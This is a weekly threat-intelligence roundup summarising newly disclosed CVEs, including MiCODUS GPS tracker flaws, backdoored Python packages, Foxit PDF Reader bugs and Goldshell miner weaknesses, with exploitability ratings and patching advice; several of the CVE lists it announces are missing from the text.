This week saw the publication of 579 new CVE IDs. Of those, 356 have not yet been assigned official CVSS scores, however, of the ones that were, approximately 6% were of critical severity, 37% were high, 52% were medium, and 5% were low. Listed below are the vulnerabilities that caught our attention:
The modern threat landscape represents an ever-changing vista of vulnerabilities, tools, tactics, and procedures which pose an existential threat to the security of organizations’ IT infrastructures. A key part of an evergreen security program is to maintain an up-to-date knowledge base of actionable threat intelligence that an organization can leverage to improve its security posture. Where dozens of novel threats and vulnerabilities become public each week, it can be challenging for IT professionals to keep pace. Control Gap intends to separate the signal from the noise by highlighting in this weekly segment newly disclosed vulnerabilities that have been assigned a CVE ID and which may be exceedingly novel, widespread, critical, or otherwise noteworthy.
The available threat intelligence at time of writing is documented below. Updates will be clearly marked.
Real-World Exploitability High |
Exploited in the Wild Likely |
Available Public Exploits Yes |
Multiple vulnerabilities surrounding the MiCODUS GPS tracker model MV720 including: remote code execution, cross-site scripting, and insecure direct object references which can disclose sensitive information were published by cyber security firm BitSight. Some sensitive functionalities which could be controlled through the device are, car fuel-offs, and alarms. BitSight claims that these GPS devices are seeing use in vehicles owned by fortune 50 firms, critical infrastructure companies and various world governments. CISA released an advisory recommending that end users ensure that these devices are not remotely available as public exploits have been released. While six vulnerabilities have been discovered by BitSight only five have been assigned CVE ids. The CVE ids which have been assigned are as follows:
Microsoft’s Patch Tuesday on July 12th, 2022, saw disclosure of 84 security vulnerabilities for Microsoft products. Highlights from these disclosures include the following:
Real-World Exploitability High |
Exploited in the Wild Unknown |
Available Public Exploits No |
For the second month in a row multiple Python package index projects have been found to contain backdoors which would allow for remote code execution in the context of the application utilizing the package. These backdoors were inserted to the projects by an unknown third-party. Vulnerability to the backdoor would be highly contingent on the usage of the package and the availability of the affected system to exploit. This highlights the importance of software and supply chain governance and the need for professional review when an organization seeks to use a third-party open-source component in its own projects. The affected packages, associated versions and corresponding CVE ids can be found below:
Real-World Exploitability High |
Exploited in the Wild Unknown |
Available Public Exploits No |
A total of 18 vulnerabilities were published for Foxit PDF Reader version 11.2.1.53537. Multiple components of the program are affected and can allow for information disclosure and remote code execution if an attacker can convince a user to interact with a crafted PDF file. Foxit has released a security bulletin to address these vulnerabilities and encourages users to update to the latest version, no public exploits have been released at the time of writing. Foxit claims that the Foxit PDF Reader is used by more than 425 million users globally making these vulnerabilities incredibly widespread and an attractive attack vector for PDF document-based attacks. The 18 CVE ids and summary descriptions can be found here.
Real-World Exploitability High |
Exploited in the Wild Unknown |
Available Public Exploits Yes |
Multiple vulnerabilities have been discovered in Goldshell ASIC miners which include an exposed debug interface, path traversal and default credentials for the installed SSH service. Security researcher James Chambers detailed these vulnerabilities and PoC exploits in a blog post where he examined multiple crypto currency mining devices. These vulnerabilities would allow for information disclosure including arbitrary files or passwords and other confidential information in plaintext, in addition to allowing arbitrary users remote access to the device. These vulnerabilities should be particularly concerning given the financial risk inherent to the compromise of these devices. The CVE ids tracking these vulnerabilities are as follows: CVE-2022-24660, CVE-2022-24659, CVE-2022-24657.